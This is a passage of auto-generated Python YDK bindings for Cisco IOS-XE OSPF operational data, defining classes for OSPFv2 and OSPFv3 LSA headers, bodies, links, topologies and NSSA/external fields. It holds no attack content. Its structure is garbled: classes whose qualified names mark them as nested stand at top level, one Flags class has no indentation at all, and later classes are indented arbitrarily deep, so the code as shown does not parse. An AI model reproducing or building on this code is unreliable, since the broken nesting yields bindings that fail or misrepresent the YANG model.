            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))])
            self._leafs = OrderedDict([
                ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
                ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
                ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
                ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
            ])
            self.num_of_links = None
            self.summary_mask = None
            self.external_mask = None
            self.body_flag_options = Bits()
            self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network()
            self.network.parent = self
            self._children_name_map["network"] = "network"
            self._segment_path = lambda: "lsa-body"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)

        class Network(Entity):
            """Network-LSA payload: network mask and the attached routers (leaf-list)."""

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__()
                self.yang_name = "network"
                self.yang_parent_name = "lsa-body"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
                    ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
                ])
                self.network_mask = None
                self.attached_router = []
                self._segment_path = lambda: "network"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
    """Auto-generated YDK binding for the 'ospfv2-link' YANG list under the
    inner area-scope-lsa list, keyed by (link-id, link-data), with per-topology
    metrics as a nested list."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__()
        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list keys, embedded into the XPath segment below.
        self.ylist_key_names = ['link_id','link_data']
        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))])
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        self.link_id = None
        self.link_data = None
        self.type = None
        self.ospfv2_topology = YList(self)
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)

    class Ospfv2Topology(Entity):
        """Per-topology (mt-id) metric for this OSPFv2 link; list keyed by mt-id."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__()
            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            self.mt_id = None
            self.metric = None
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
    """Auto-generated YDK binding for the 'ospfv2-topology' YANG list that
    hangs directly off the inner area-scope-lsa list (distinct from the
    identically-named list nested under ospfv2-link); keyed by mt-id."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__()
        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list key, embedded into the XPath segment below.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
    """Auto-generated YDK binding for the 'ospfv2-external' YANG list under the
    inner area-scope-lsa list, keyed by mt-id (external-LSA metric/forwarding data)."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__()
        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # YANG list key, embedded into the XPath segment below.
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
        self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
    """Auto-generated YDK binding for the 'ospfv3-lsa' container under the
    inner area-scope-lsa list: an OSPFv3 LSA split into a header and a body
    (the nested Header/LsaBody classes follow in the generated file)."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__()
        self.yang_name = "ospfv3-lsa"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody))])
        self._leafs = OrderedDict()
        # Singleton child containers with parent back-links.
        self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header()
        self.header.parent = self
        self._children_name_map["header"] = "header"
        self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody()
        self.lsa_body.parent = self
        self._children_name_map["lsa_body"] = "lsa-body"
        self._segment_path = lambda: "ospfv3-lsa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value)
class Header(Entity):
    """Auto-generated YDK binding for the OSPFv3 LSA 'header' container:
    the LSA id plus a nested 'lsa-header' container with the common fields."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__()
        self.yang_name = "header"
        self.yang_parent_name = "ospfv3-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))])
        self._leafs = OrderedDict([
            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
            ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
        ])
        self.lsa_id = None
        self.lsa_hdr_options = Bits()
        self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader()
        self.lsa_header.parent = self
        self._children_name_map["lsa_header"] = "lsa-header"
        self._segment_path = lambda: "header"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)

    class LsaHeader(Entity):
        """Common LSA header fields: age, type, adv-router, seq-num, checksum, length."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__()
            self.yang_name = "lsa-header"
            self.yang_parent_name = "header"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ])
            self.age = None
            self.type = None
            self.adv_router = None
            self.seq_num = None
            self.checksum = None
            self.length = None
            self._segment_path = lambda: "lsa-header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
    """Auto-generated YDK binding for the OSPFv3 'lsa-body' container: flag
    bit-fields plus one singleton sub-container per decoded LSA body type
    (network, prefix, ia-router, lsa-external, nssa, link-data, ia-prefix).
    The nested sub-container classes follow in the generated file."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__()
        self.yang_name = "lsa-body"
        self.yang_parent_name = "ospfv3-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child YANG node name -> (python attribute, binding class) for every body variant.
        self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix))])
        self._leafs = OrderedDict([
            ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
            ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
        ])
        self.lsa_flag_options = Bits()
        self.lsa_body_flags = Bits()
        # Singleton child containers: instantiate, back-link parent, and map
        # python attribute -> YANG child name.
        self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network()
        self.network.parent = self
        self._children_name_map["network"] = "network"
        self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"
        self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter()
        self.ia_router.parent = self
        self._children_name_map["ia_router"] = "ia-router"
        self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal()
        self.lsa_external.parent = self
        self._children_name_map["lsa_external"] = "lsa-external"
        self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa()
        self.nssa.parent = self
        self._children_name_map["nssa"] = "nssa"
        self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData()
        self.link_data.parent = self
        self._children_name_map["link_data"] = "link-data"
        self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix()
        self.ia_prefix.parent = self
        self._children_name_map["ia_prefix"] = "ia-prefix"
        self._segment_path = lambda: "lsa-body"
        # Must stay the final assignment: later writes go through the validating __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
    """Auto-generated YDK binding for the OSPFv3 network-LSA body: attached
    routers (leaf-list) and the network options bit-field."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__()
        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
            ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
        ])
        self.attached_router = []
        self.lsa_net_options = Bits()
        self._segment_path = lambda: "network"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
    """Auto-generated YDK binding for the OSPFv3 inter-area-prefix LSA body:
    metric plus the advertised prefix and its options."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
        self.yang_name = "prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
            ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
        ])
        self.metric = None
        self.ia_prefix = None
        self.ia_prefix_options = None
        self._segment_path = lambda: "prefix"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
    """Auto-generated YDK binding for the OSPFv3 inter-area-router LSA body:
    metric, destination router id, and the options bit-field."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
        self.yang_name = "ia-router"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
            ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
        ])
        self.metric = None
        self.destination_router_id = None
        self.lsa_ia_options = Bits()
        self._segment_path = lambda: "ia-router"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
    """Auto-generated YDK binding for the OSPFv3 AS-external LSA body:
    metric, external prefix/options, forwarding address, route tag,
    referenced LS type/id, plus a nested 'flags' container."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
        self.yang_name = "lsa-external"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None
        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-external"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)

    class Flags(Entity):
        """Single 'e-flag' boolean of the external-LSA flags container."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
            self.yang_name = "flags"
            self.yang_parent_name = "lsa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
    """Auto-generated YDK binding for the OSPFv3 'nssa' container: wraps a
    single 'lsa-nssa-external' child (class defined below in the generated file)."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
        self.yang_name = "nssa"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
        self._leafs = OrderedDict()
        self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
        self.lsa_nssa_external.parent = self
        self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
        self._segment_path = lambda: "nssa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
    """Auto-generated YDK binding for the OSPFv3 NSSA-external LSA body:
    same field set as the AS-external body (metric, prefix, forwarding
    address, route tag, referenced LS type/id) plus a nested 'flags'
    container (defined after this class in the generated file)."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
        self.yang_name = "lsa-nssa-external"
        self.yang_parent_name = "nssa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None
        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-nssa-external"
        # Must stay the final assignment: later writes go through the validating __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
                                class LinkData(Entity):
                                    """Generated binding for YANG container 'link-data' under 'lsa-body' (Cisco-IOS-XE ospf-oper): OSPFv3 link-LSA data (router priority, link-local address, prefix count, options bits)."""
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
                                        self.yang_name = "link-data"
                                        self.yang_parent_name = "lsa-body"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        self._child_classes = OrderedDict([])
                                        self._leafs = OrderedDict([
                                            ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
                                            ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
                                            ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
                                            ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
                                        ])
                                        self.rtr_priority = None
                                        self.link_local_interface_address = None
                                        self.num_of_prefixes = None
                                        # Bits-typed leaf gets an empty Bits container rather than None.
                                        self.lsa_id_options = Bits()
                                        self._segment_path = lambda: "link-data"
                                        self._is_frozen = True
                                    def __setattr__(self, name, value):
                                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
                                class IaPrefix(Entity):
                                    """Generated binding for YANG container 'ia-prefix' under 'lsa-body' (Cisco-IOS-XE ospf-oper): intra-area-prefix LSA reference data."""
                                    _prefix = 'ospf-ios-xe-oper'
                                    _revision = '2018-02-01'
                                    def __init__(self):
                                        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
                                        self.yang_name = "ia-prefix"
                                        self.yang_parent_name = "lsa-body"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = []
                                        self._child_classes = OrderedDict([])
                                        self._leafs = OrderedDict([
                                            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                            ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
                                            ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
                                        ])
                                        self.referenced_ls_type = None
